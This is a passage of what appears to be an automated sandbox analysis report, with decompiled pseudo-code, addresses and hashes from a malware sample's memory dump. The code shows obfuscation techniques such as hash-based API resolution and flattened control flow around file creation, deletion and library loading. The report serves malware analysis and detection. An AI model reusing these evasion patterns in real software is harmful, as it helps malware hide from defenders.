                                                                                                      						 *_t49(0,  &_v524, 0x104);
                                                                                                      						_t97 = 0x3b13cdbe;
                                                                                                      						goto L1;
                                                                                                      					} else {
                                                                                                      						__eflags = _t97 - 0x3b13cdbe;
                                                                                                      						if(_t97 != 0x3b13cdbe) {
                                                                                                      							goto L15;
                                                                                                      						} else {
                                                                                                      							__eflags =  *0x20bded8;
                                                                                                      							if( *0x20bded8 == 0) {
                                                                                                      								_t69 = E020B3E70(0xbb51e2dc);
                                                                                                      								_t93 = 0xe04f22b3;
                                                                                                      								 *0x20bded8 = E020B3DD0(_t75, _t69, 0xe04f22b3, _t100);
                                                                                                      							}
                                                                                                      							_t62 = CreateFileW( &_v524, _v588, _v576, 0, _v592, _v596, 0); // executed
                                                                                                      							_t96 = _t62;
                                                                                                      							__eflags = _t96 - 0xffffffff;
                                                                                                      							if(_t96 == 0xffffffff) {
                                                                                                      								break;
                                                                                                      							} else {
                                                                                                      								_t97 = 0x1de4fdf5;
                                                                                                      								goto L1;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      					goto L30;
                                                                                                      					L15:
                                                                                                      					__eflags = _t97 - 0x39234310;
                                                                                                      				} while (_t97 != 0x39234310);
                                                                                                      				L16:
                                                                                                      				__eflags = 0;
                                                                                                      				return 0;
                                                                                                      				goto L30;
                                                                                                      			}































                                                                                                      0x020b8330
                                                                                                      0x020b8330
                                                                                                      0x020b8336
                                                                                                      0x020b8345
                                                                                                      0x020b834a
                                                                                                      0x020b834e
                                                                                                      0x020b8356
                                                                                                      0x020b835e
                                                                                                      0x020b8363
                                                                                                      0x020b836b
                                                                                                      0x020b836f
                                                                                                      0x020b837e
                                                                                                      0x020b8387
                                                                                                      0x020b838b
                                                                                                      0x020b8393
                                                                                                      0x020b839b
                                                                                                      0x020b83a0
                                                                                                      0x020b83a8
                                                                                                      0x020b83a8
                                                                                                      0x020b83b0
                                                                                                      0x020b83b0
                                                                                                      0x020b83b0
                                                                                                      0x020b83b0
                                                                                                      0x020b83b6
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b83bc
                                                                                                      0x020b8417
                                                                                                      0x020b841c
                                                                                                      0x020b841e
                                                                                                      0x020b8425
                                                                                                      0x020b842a
                                                                                                      0x020b8431
                                                                                                      0x020b8436
                                                                                                      0x020b8436
                                                                                                      0x020b8445
                                                                                                      0x020b8449
                                                                                                      0x020b844b
                                                                                                      0x020b8456
                                                                                                      0x020b845c
                                                                                                      0x020b845e
                                                                                                      0x020b8465
                                                                                                      0x020b846a
                                                                                                      0x020b8471
                                                                                                      0x020b8476
                                                                                                      0x020b8476
                                                                                                      0x020b847c
                                                                                                      0x00000000
                                                                                                      0x020b83be
                                                                                                      0x020b83c4
                                                                                                      0x020b853b
                                                                                                      0x020b8543
                                                                                                      0x020b8563
                                                                                                      0x020b8567
                                                                                                      0x020b856f
                                                                                                      0x020b8573
                                                                                                      0x020b8577
                                                                                                      0x020b857f
                                                                                                      0x020b8581
                                                                                                      0x00000000
                                                                                                      0x020b8587
                                                                                                      0x020b8587
                                                                                                      0x020b8592
                                                                                                      0x020b859e
                                                                                                      0x020b8589
                                                                                                      0x020b8589
                                                                                                      0x020b858b
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b858b
                                                                                                      0x020b8587
                                                                                                      0x020b83ca
                                                                                                      0x020b83d0
                                                                                                      0x020b83e5
                                                                                                      0x020b83ea
                                                                                                      0x020b83ec
                                                                                                      0x020b83f3
                                                                                                      0x020b83f8
                                                                                                      0x020b83ff
                                                                                                      0x020b8404
                                                                                                      0x020b8404
                                                                                                      0x020b840e
                                                                                                      0x020b8410
                                                                                                      0x00000000
                                                                                                      0x020b83d2
                                                                                                      0x020b83d8
                                                                                                      0x00000000
                                                                                                      0x020b83de
                                                                                                      0x020b83de
                                                                                                      0x00000000
                                                                                                      0x020b83de
                                                                                                      0x020b83d8
                                                                                                      0x020b83d0
                                                                                                      0x020b83c4
                                                                                                      0x00000000
                                                                                                      0x020b83bc
                                                                                                      0x020b8495
                                                                                                      0x020b849b
                                                                                                      0x020b84fd
                                                                                                      0x020b8502
                                                                                                      0x020b8504
                                                                                                      0x020b850b
                                                                                                      0x020b8510
                                                                                                      0x020b8517
                                                                                                      0x020b851c
                                                                                                      0x020b851c
                                                                                                      0x020b852d
                                                                                                      0x020b852f
                                                                                                      0x00000000
                                                                                                      0x020b849d
                                                                                                      0x020b849d
                                                                                                      0x020b84a3
                                                                                                      0x00000000
                                                                                                      0x020b84a5
                                                                                                      0x020b84ab
                                                                                                      0x020b84ad
                                                                                                      0x020b84b4
                                                                                                      0x020b84b9
                                                                                                      0x020b84c7
                                                                                                      0x020b84c7
                                                                                                      0x020b84ea
                                                                                                      0x020b84ec
                                                                                                      0x020b84ee
                                                                                                      0x020b84f1
                                                                                                      0x00000000
                                                                                                      0x020b84f3
                                                                                                      0x020b84f3
                                                                                                      0x00000000
                                                                                                      0x020b84f3
                                                                                                      0x020b84f1
                                                                                                      0x020b84a3
                                                                                                      0x00000000
                                                                                                      0x020b847e
                                                                                                      0x020b847e
                                                                                                      0x020b847e
                                                                                                      0x020b848a
                                                                                                      0x020b848a
                                                                                                      0x020b8494
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,B2D6078E,00000000,?,?,?,?,3444DC2F), ref: 020B84EA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: b251ebcccdd6cec0b8598ba68f10100e0da0f55960df41582e37052c594520d4
                                                                                                      • Instruction ID: bf3f896ba517d13da910df30b07802a5d0d23e0218774ad09f236f89f977f894
                                                                                                      • Opcode Fuzzy Hash: b251ebcccdd6cec0b8598ba68f10100e0da0f55960df41582e37052c594520d4
                                                                                                      • Instruction Fuzzy Hash: DE51BE71A043019BD72ADF68D4846AFB7E6AF84744F10891DF4A59B2A0DB74DC449F82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 71%
                                                                                                      			E020B3650(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				char _v520;
                                                                                                      				intOrPtr* _t3;
                                                                                                      				intOrPtr* _t5;
                                                                                                      				intOrPtr* _t7;
                                                                                                      				int _t10;
                                                                                                      				void* _t16;
                                                                                                      				void* _t34;
                                                                                                      				void* _t35;
                                                                                                      				void* _t38;
                                                                                                      				void* _t40;
                                                                                                      				void* _t41;
                                                                                                      				WCHAR* _t42;
                                                                                                      
                                                                                                      				_t41 =  &_v520;
                                                                                                      				_t34 = __ecx;
                                                                                                      				_t38 = E020B3460(0x20bd2b0);
                                                                                                      				_t3 =  *0x20bdf10;
                                                                                                      				if(_t3 == 0) {
                                                                                                      					_t3 = E020B3DD0(_t16, E020B3E70(0xe60124ba), 0xec538b3a, _t40);
                                                                                                      					 *0x20bdf10 = _t3;
                                                                                                      				}
                                                                                                      				 *_t3( &_v520, 0x104, _t38, _t34);
                                                                                                      				_t5 =  *0x20bddc8;
                                                                                                      				_t42 = _t41 + 0x10;
                                                                                                      				if(_t5 == 0) {
                                                                                                      					_t5 = E020B3DD0(_t16, E020B3E70(0xbb51e2dc), 0x298e8809, _t40);
                                                                                                      					 *0x20bddc8 = _t5;
                                                                                                      				}
                                                                                                      				_t35 =  *_t5();
                                                                                                      				_t7 =  *0x20bdbec;
                                                                                                      				if(_t7 == 0) {
                                                                                                      					_t7 = E020B3DD0(_t16, E020B3E70(0xbb51e2dc), 0x632f374, _t40);
                                                                                                      					 *0x20bdbec = _t7;
                                                                                                      				}
                                                                                                      				 *_t7(_t35, 0, _t38);
                                                                                                      				if( *0x20be230 == 0) {
                                                                                                      					 *0x20be230 = E020B3DD0(_t16, E020B3E70(0xbb51e2dc), 0x289b49dc, _t40);
                                                                                                      				}
                                                                                                      				_t10 = DeleteFileW(_t42); // executed
                                                                                                      				return _t10;
                                                                                                      			}















                                                                                                      0x020b3650
                                                                                                      0x020b3658
                                                                                                      0x020b3664
                                                                                                      0x020b3666
                                                                                                      0x020b366d
                                                                                                      0x020b3680
                                                                                                      0x020b3685
                                                                                                      0x020b3685
                                                                                                      0x020b3696
                                                                                                      0x020b3698
                                                                                                      0x020b369d
                                                                                                      0x020b36a2
                                                                                                      0x020b36b5
                                                                                                      0x020b36ba
                                                                                                      0x020b36ba
                                                                                                      0x020b36c1
                                                                                                      0x020b36c3
                                                                                                      0x020b36ca
                                                                                                      0x020b36dd
                                                                                                      0x020b36e2
                                                                                                      0x020b36e2
                                                                                                      0x020b36eb
                                                                                                      0x020b36f6
                                                                                                      0x020b370e
                                                                                                      0x020b370e
                                                                                                      0x020b3717
                                                                                                      0x020b371f

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: DeleteFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 4033686569-0
                                                                                                      • Opcode ID: ae71cc1fd94bd3735656779a624bfb4aa8073baff8e1e5090b92e6e26e3d8a78
                                                                                                      • Instruction ID: 026a0001c519119403afb26ef8824fc70617d4ca37d04855a227cceed6e687c6
                                                                                                      • Opcode Fuzzy Hash: ae71cc1fd94bd3735656779a624bfb4aa8073baff8e1e5090b92e6e26e3d8a78
                                                                                                      • Instruction Fuzzy Hash: 2A118F24B443008BE77BBBB49851AEB32D7AFC5340F204869E425CB380EE78DD119B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 75%
                                                                                                      			E020B7010(signed int __edx) {
                                                                                                      				struct HINSTANCE__* _t6;
                                                                                                      				intOrPtr* _t7;
                                                                                                      				intOrPtr* _t9;
                                                                                                      				void* _t15;
                                                                                                      				void* _t16;
                                                                                                      				signed int _t28;
                                                                                                      				void* _t29;
                                                                                                      				WCHAR* _t30;
                                                                                                      				void* _t31;
                                                                                                      
                                                                                                      				_t28 = __edx;
                                                                                                      				_t30 = E020B3460(_t16);
                                                                                                      				if( *0x20bdd48 == 0) {
                                                                                                      					 *0x20bdd48 = E020B3DD0(_t15, E020B3E70(0xbb51e2dc), 0xb290dbae, _t31);
                                                                                                      				}
                                                                                                      				_t6 = LoadLibraryW(_t30); // executed
                                                                                                      				 *( *0x20be364 + 0x10 + _t28 * 4) = _t6;
                                                                                                      				_t7 =  *0x20bddc8;
                                                                                                      				if(_t7 == 0) {
                                                                                                      					_t7 = E020B3DD0(_t15, E020B3E70(0xbb51e2dc), 0x298e8809, _t31);
                                                                                                      					 *0x20bddc8 = _t7;
                                                                                                      				}
                                                                                                      				_t29 =  *_t7();
                                                                                                      				_t9 =  *0x20bdbec;
                                                                                                      				if(_t9 == 0) {
                                                                                                      					_t9 = E020B3DD0(_t15, E020B3E70(0xbb51e2dc), 0x632f374, _t31);
                                                                                                      					 *0x20bdbec = _t9;
                                                                                                      				}
                                                                                                      				return  *_t9(_t29, 0, _t30);
                                                                                                      			}












                                                                                                      0x020b7012
                                                                                                      0x020b7019
                                                                                                      0x020b7022
                                                                                                      0x020b703a
                                                                                                      0x020b703a
                                                                                                      0x020b7040
                                                                                                      0x020b7048
                                                                                                      0x020b704c
                                                                                                      0x020b7053
                                                                                                      0x020b7066
                                                                                                      0x020b706b
                                                                                                      0x020b706b
                                                                                                      0x020b7072
                                                                                                      0x020b7074
                                                                                                      0x020b707b
                                                                                                      0x020b708e
                                                                                                      0x020b7093
                                                                                                      0x020b7093
                                                                                                      0x020b70a0

                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,3444DC2F,020B723F,?,3444DC2F,020B6587), ref: 020B7040
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: 65dabab8adb2d7f2c706aa138f0117d0761c033399c7d9a27a17dcd8039269df
                                                                                                      • Instruction ID: 803585488e9994ea696e74f6fdc56fe177a414adf7e8eb6db98e997ac672b841
                                                                                                      • Opcode Fuzzy Hash: 65dabab8adb2d7f2c706aa138f0117d0761c033399c7d9a27a17dcd8039269df
                                                                                                      • Instruction Fuzzy Hash: F8014F34B543048BA77BAB75A850AEA66D7BFC6680B24086AE015CB390EA349C419F91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 79%
                                                                                                      			E020B4220(void* __ebx, long __ecx) {
                                                                                                      				intOrPtr* _t1;
                                                                                                      				void* _t4;
                                                                                                      				void* _t16;
                                                                                                      				long _t17;
                                                                                                      				void* _t18;
                                                                                                      
                                                                                                      				_t8 = __ebx;
                                                                                                      				_t1 =  *0x20bddc8;
                                                                                                      				_t17 = __ecx;
                                                                                                      				if(_t1 == 0) {
                                                                                                      					_t1 = E020B3DD0(__ebx, E020B3E70(0xbb51e2dc), 0x298e8809, _t18);
                                                                                                      					 *0x20bddc8 = _t1;
                                                                                                      				}
                                                                                                      				_t16 =  *_t1();
                                                                                                      				if( *0x20bdcf0 == 0) {
                                                                                                      					 *0x20bdcf0 = E020B3DD0(_t8, E020B3E70(0xbb51e2dc), 0xc9d236a5, _t18);
                                                                                                      				}
                                                                                                      				_t4 = RtlAllocateHeap(_t16, 8, _t17); // executed
                                                                                                      				return _t4;
                                                                                                      			}








                                                                                                      0x020b4220
                                                                                                      0x020b4220
                                                                                                      0x020b4226
                                                                                                      0x020b422b
                                                                                                      0x020b423e
                                                                                                      0x020b4243
                                                                                                      0x020b4243
                                                                                                      0x020b424a
                                                                                                      0x020b4253
                                                                                                      0x020b426b
                                                                                                      0x020b426b
                                                                                                      0x020b4274
                                                                                                      0x020b4278

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,020B68F1), ref: 020B4274
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.257535197.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.257576055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_20b0000_RpcNs4.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: a633ac69491b30c6140a0984645aedaceee39b9762fed843844a9353168907bb
                                                                                                      • Instruction ID: c712fa4312cf47aa57396efa2b6211a9e785a9737592b719b293df72e3e87082
                                                                                                      • Opcode Fuzzy Hash: a633ac69491b30c6140a0984645aedaceee39b9762fed843844a9353168907bb
                                                                                                      • Instruction Fuzzy Hash: 47E06525B503015BBB7BABB46820AEB21DBBFC6680B100479F510D7344EE749C056B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      C-Code - Quality: 79%
                                                                                                      			E020B64F0() {
                                                                                                      				intOrPtr _v8;
                                                                                                      				char _v16;
                                                                                                      				char _v24;
                                                                                                      				signed int _v28;
                                                                                                      				signed int _v32;
                                                                                                      				intOrPtr _v36;
                                                                                                      				intOrPtr _v40;
                                                                                                      				char _v48;
                                                                                                      				char _v76;
                                                                                                      				signed int _v80;
                                                                                                      				char _v88;
                                                                                                      				char _v96;
                                                                                                      				signed int _v104;
                                                                                                      				char _v108;
                                                                                                      				char _v112;
                                                                                                      				signed int _v120;
                                                                                                      				signed int _v124;
                                                                                                      				signed int _v128;
                                                                                                      				signed int _v132;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				signed int _t268;
                                                                                                      				signed int _t270;
                                                                                                      				signed int _t272;
                                                                                                      				signed int _t274;
                                                                                                      				signed int _t277;
                                                                                                      				signed int _t282;
                                                                                                      				signed int _t284;
                                                                                                      				signed int _t285;
                                                                                                      				signed int _t289;
                                                                                                      				void* _t297;
                                                                                                      				signed int _t313;
                                                                                                      				void* _t314;
                                                                                                      				signed int _t317;
                                                                                                      				signed int _t318;
                                                                                                      				signed int _t319;
                                                                                                      				signed int _t322;
                                                                                                      				void* _t324;
                                                                                                      				signed int _t329;
                                                                                                      				char* _t330;
                                                                                                      				intOrPtr* _t331;
                                                                                                      				signed int _t338;
                                                                                                      				void* _t345;
                                                                                                      				void* _t346;
                                                                                                      				intOrPtr* _t347;
                                                                                                      				void* _t348;
                                                                                                      				intOrPtr* _t351;
                                                                                                      				signed int _t352;
                                                                                                      				void* _t353;
                                                                                                      				void* _t363;
                                                                                                      				void* _t364;
                                                                                                      				signed int _t366;
                                                                                                      				intOrPtr* _t367;
                                                                                                      				void* _t368;
                                                                                                      				intOrPtr* _t369;
                                                                                                      				signed int _t370;
                                                                                                      				void* _t371;
                                                                                                      				void* _t372;
                                                                                                      				signed int _t385;
                                                                                                      				signed int _t390;
                                                                                                      				signed int _t406;
                                                                                                      				signed int _t410;
                                                                                                      				intOrPtr _t428;
                                                                                                      				signed int _t448;
                                                                                                      				signed int _t469;
                                                                                                      				signed int _t476;
                                                                                                      				void* _t478;
                                                                                                      				signed int _t483;
                                                                                                      				signed int _t487;
                                                                                                      				signed int _t489;
                                                                                                      				signed int _t494;
                                                                                                      				signed int _t498;
                                                                                                      				signed int _t503;
                                                                                                      				void* _t505;
                                                                                                      				void* _t507;
                                                                                                      				void* _t508;
                                                                                                      				void* _t509;
                                                                                                      				void* _t510;
                                                                                                      
                                                                                                      				_t505 = (_t503 & 0xfffffff8) - 0x80;
                                                                                                      				_t390 = _v124;
                                                                                                      				_t266 = 0x2b1fe9b9;
                                                                                                      				_t498 = _v120;
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					_t469 = _v124;
                                                                                                      					while(1) {
                                                                                                      						L2:
                                                                                                      						_t478 = 0x3444dc2f;
                                                                                                      						do {
                                                                                                      							while(1) {
                                                                                                      								L3:
                                                                                                      								_t507 = _t266 - 0x1ab1f9aa;
                                                                                                      								if(_t507 > 0) {
                                                                                                      									break;
                                                                                                      								}
                                                                                                      								if(_t507 == 0) {
                                                                                                      									_v132 = 0xb789;
                                                                                                      									_v132 = 0x4ec4ec4f * _v132 >> 0x20 >> 5;
                                                                                                      									_v132 = _v132 >> 0xc;
                                                                                                      									_v132 = _v132 | 0xe71d92d3;
                                                                                                      									_v132 = _v132 * 0x16;
                                                                                                      									_v132 = _v132 ^ 0x841b81aa;
                                                                                                      									_v132 = _v132 << 4;
                                                                                                      									_v132 = _v132 + 0xffff0f4d;
                                                                                                      									_v132 = _v132 ^ 0x89110425;
                                                                                                      									_v28 = _v132;
                                                                                                      									_t266 = 0x3afae495;
                                                                                                      									continue;
                                                                                                      								} else {
                                                                                                      									_t508 = _t266 - 0xb7085db;
                                                                                                      									if(_t508 > 0) {
                                                                                                      										__eflags = _t266 - 0xe7f2b49;
                                                                                                      										if(__eflags > 0) {
                                                                                                      											__eflags = _t266 - 0x144f93da;
                                                                                                      											if(__eflags > 0) {
                                                                                                      												__eflags = _t266 - 0x18fae292;
                                                                                                      												if(_t266 != 0x18fae292) {
                                                                                                      													goto L52;
                                                                                                      												} else {
                                                                                                      													_t448 =  &_v104;
                                                                                                      													_t338 = E020B73B0( &_v48, _t448);
                                                                                                      													asm("sbb eax, eax");
                                                                                                      													_t266 = ( ~_t338 & 0x22044530) + 0xd495408;
                                                                                                      													continue;
                                                                                                      												}
                                                                                                      											} else {
                                                                                                      												if(__eflags == 0) {
                                                                                                      													_v8 =  *((intOrPtr*)( *0x20be368 + 0x42c));
                                                                                                      													_t266 = 0x2815f50d;
                                                                                                      													continue;
                                                                                                      												} else {
                                                                                                      													__eflags = _t266 - 0x10711f6a;
                                                                                                      													if(_t266 == 0x10711f6a) {
                                                                                                      														E020B94C0();
                                                                                                      														_t266 = 0xe6e52c9;
                                                                                                      														continue;
                                                                                                      													} else {
                                                                                                      														__eflags = _t266 - 0x10979a6d;
                                                                                                      														if(_t266 != 0x10979a6d) {
                                                                                                      															goto L52;
                                                                                                      														} else {
                                                                                                      															_v124 = 0x1f5391db;
                                                                                                      															_t345 = E020B5DA0();
                                                                                                      															_t346 = E020B5E10();
                                                                                                      															__eflags = _t345 - _t346;
                                                                                                      															if(_t345 <= _t346) {
                                                                                                      																_t483 = 0;
                                                                                                      																__eflags = 0;
                                                                                                      															} else {
                                                                                                      																_t351 = E020B40C0(_t390, 0xbb51e2dc, 0x8ecd1a70, _t498, 0x24);
                                                                                                      																_t505 = _t505 + 4;
                                                                                                      																_t352 =  *_t351();
                                                                                                      																_t353 = E020B5DA0();
                                                                                                      																_t483 = _t352 % (_t353 - E020B5E10());
                                                                                                      															}
                                                                                                      															_t448 = 0xef283af6;
                                                                                                      															_t347 = E020B40C0(_t390, 0xbb51e2dc, 0xef283af6, _t498, 6);
                                                                                                      															_t505 = _t505 + 4;
                                                                                                      															_t348 =  *_t347();
                                                                                                      															_t498 = 0xef283af6;
                                                                                                      															_t390 = _t348 + E020B5E10() + _t483;
                                                                                                      															_t266 = 0xb8518cc;
                                                                                                      															asm("adc ebp, 0x0");
                                                                                                      															while(1) {
                                                                                                      																L1:
                                                                                                      																_t469 = _v124;
                                                                                                      																while(1) {
                                                                                                      																	L2:
                                                                                                      																	_t478 = 0x3444dc2f;
                                                                                                      																	goto L3;
                                                                                                      																}
                                                                                                      															}
                                                                                                      														}
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										} else {
                                                                                                      											if(__eflags == 0) {
                                                                                                      												_v128 = 0x98c7;
                                                                                                      												_v128 = _v128 << 0xe;
                                                                                                      												_v128 = _v128 | 0x7f181ffb;
                                                                                                      												_t410 = _v128;
                                                                                                      												_t448 = 0x3e22cbcf * _t410 >> 0x20;
                                                                                                      												_v128 = (_t410 - _t448 >> 1) + _t448 >> 6;
                                                                                                      												_v128 = _v128 ^ 0x00080dbe;
                                                                                                      												_v32 = _v128;
                                                                                                      												_t266 = 0x1ab1f9aa;
                                                                                                      												continue;
                                                                                                      											} else {
                                                                                                      												__eflags = _t266 - 0xd495408;
                                                                                                      												if(__eflags > 0) {
                                                                                                      													__eflags = _t266 - 0xe6e52c9;
                                                                                                      													if(_t266 != 0xe6e52c9) {
                                                                                                      														goto L52;
                                                                                                      													} else {
                                                                                                      														_t268 = E020B8A70();
                                                                                                      														__eflags = _t268;
                                                                                                      														if(_t268 == 0) {
                                                                                                      															goto L148;
                                                                                                      														} else {
                                                                                                      															_t266 = 0x1f785438;
                                                                                                      															continue;
                                                                                                      														}
                                                                                                      													}
                                                                                                      												} else {
                                                                                                      													if(__eflags == 0) {
                                                                                                      														E020B4180(_t390, _v16);
                                                                                                      														_t266 = 0x25639e4;
                                                                                                      														continue;
                                                                                                      													} else {
                                                                                                      														__eflags = _t266 - 0xb8518cc;
                                                                                                      														if(_t266 == 0xb8518cc) {
                                                                                                      															__eflags = _t390 | _t498;
                                                                                                      															if((_t390 | _t498) == 0) {
                                                                                                      																L51:
                                                                                                      																_t266 = _t469;
                                                                                                      																goto L52;
                                                                                                      															} else {
                                                                                                      																_t363 = E020B5C70();
                                                                                                      																_t364 = E020B5C40();
                                                                                                      																__eflags = _t364 - _t363;
                                                                                                      																if(_t364 <= _t363) {
                                                                                                      																	_t448 = 0;
                                                                                                      																	__eflags = 0;
                                                                                                      																} else {
                                                                                                      																	_t369 = E020B40C0(_t390, 0xbb51e2dc, 0x8ecd1a70, _t498, 0x24);
                                                                                                      																	_t505 = _t505 + 4;
                                                                                                      																	_t370 =  *_t369();
                                                                                                      																	_t371 = E020B5C70();
                                                                                                      																	_t372 = E020B5C40();
                                                                                                      																	_t478 = 0x3444dc2f;
                                                                                                      																	_t448 = _t370 % (_t372 - _t371);
                                                                                                      																}
                                                                                                      																_t366 = E020B9ED0(_t390, _t448 + E020B5C70());
                                                                                                      																__eflags = _t366;
                                                                                                      																if(_t366 == 0) {
                                                                                                      																	_t448 = 0xef283af6;
                                                                                                      																	_t367 = E020B40C0(_t390, 0xbb51e2dc, 0xef283af6, _t498, 6);
                                                                                                      																	_t505 = _t505 + 4;
                                                                                                      																	_t368 =  *_t367();
                                                                                                      																	__eflags = 0xef283af6 - _t498;
                                                                                                      																	if(__eflags < 0) {
                                                                                                      																		goto L23;
                                                                                                      																	} else {
                                                                                                      																		if(__eflags > 0) {
                                                                                                      																			goto L51;
                                                                                                      																		} else {
                                                                                                      																			__eflags = _t368 - _t390;
                                                                                                      																			if(_t368 < _t390) {
                                                                                                      																				goto L23;
                                                                                                      																			} else {
                                                                                                      																				goto L51;
                                                                                                      																			}
                                                                                                      																		}
                                                                                                      																	}
                                                                                                      																} else {
                                                                                                      																	L47:
                                                                                                      																	_t266 = 0xbcf3c3c;
                                                                                                      																	continue;
                                                                                                      																}
                                                                                                      															}
                                                                                                      														} else {
                                                                                                      															__eflags = _t266 - 0xbcf3c3c;
                                                                                                      															if(_t266 != 0xbcf3c3c) {
                                                                                                      																goto L52;
                                                                                                      															} else {
                                                                                                      																return E020BB140();
                                                                                                      															}
                                                                                                      														}
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										if(_t508 == 0) {
                                                                                                      											E020B8D40();
                                                                                                      											_t266 = 0x2f991c1;
                                                                                                      											continue;
                                                                                                      										} else {
                                                                                                      											_t509 = _t266 - 0x4c64487;
                                                                                                      											if(_t509 > 0) {
                                                                                                      												__eflags = _t266 - 0xa9c2762;
                                                                                                      												if(__eflags > 0) {
                                                                                                      													__eflags = _t266 - 0xb4fef9c;
                                                                                                      													if(_t266 != 0xb4fef9c) {
                                                                                                      														goto L52;
                                                                                                      													} else {
                                                                                                      														E020B4180(_t390, _v96);
                                                                                                      														_t266 = 0x2ca10f94;
                                                                                                      														continue;
                                                                                                      													}
                                                                                                      												} else {
                                                                                                      													if(__eflags == 0) {
                                                                                                      														_t448 =  &_v108;
                                                                                                      														_v112 = E020B32B0(0x20bd390, _t448);
                                                                                                      														E020B1820( &_v112);
                                                                                                      														E020B3400(_t378);
                                                                                                      														_t266 = 0x4c64487;
                                                                                                      														while(1) {
                                                                                                      															L2:
                                                                                                      															_t478 = 0x3444dc2f;
                                                                                                      															goto L3;
                                                                                                      														}
                                                                                                      													} else {
                                                                                                      														__eflags = _t266 - 0x6f0d463;
                                                                                                      														if(_t266 == 0x6f0d463) {
                                                                                                      															E020BB090( &_v16, _t448);
                                                                                                      															_t266 = 0x18fae292;
                                                                                                      															continue;
                                                                                                      														} else {
                                                                                                      															__eflags = _t266 - 0x9bb6424;
                                                                                                      															if(_t266 != 0x9bb6424) {
                                                                                                      																goto L52;
                                                                                                      															} else {
                                                                                                      																_v36 = E020B46D0(_t390, _t498);
                                                                                                      																_t266 = 0xe7f2b49;
                                                                                                      																continue;
                                                                                                      															}
                                                                                                      														}
                                                                                                      													}
                                                                                                      												}
                                                                                                      											} else {
                                                                                                      												if(_t509 == 0) {
                                                                                                      													_t266 = 0x10979a6d;
                                                                                                      													continue;
                                                                                                      												} else {
                                                                                                      													_t510 = _t266 - 0x156ae1b;
                                                                                                      													if(_t510 > 0) {
                                                                                                      														__eflags = _t266 - 0x25639e4;
                                                                                                      														if(_t266 == 0x25639e4) {
                                                                                                      															E020B4180(_t390, _v24);
                                                                                                      															L23:
                                                                                                      															_t266 = 0xb8518cc;
                                                                                                      															continue;
                                                                                                      														} else {
                                                                                                      															__eflags = _t266 - 0x2f991c1;
                                                                                                      															if(_t266 != 0x2f991c1) {
                                                                                                      																goto L52;
                                                                                                      															} else {
                                                                                                      																E020B8F10();
                                                                                                      																_t266 = 0x10711f6a;
                                                                                                      																continue;
                                                                                                      															}
                                                                                                      														}
                                                                                                      													} else {
                                                                                                      														if(_t510 == 0) {
                                                                                                      															_t385 = E020B8330(_t390, _t498);
                                                                                                      															_t406 =  *0x20be368;
                                                                                                      															__eflags = _t385;
                                                                                                      															if(_t385 == 0) {
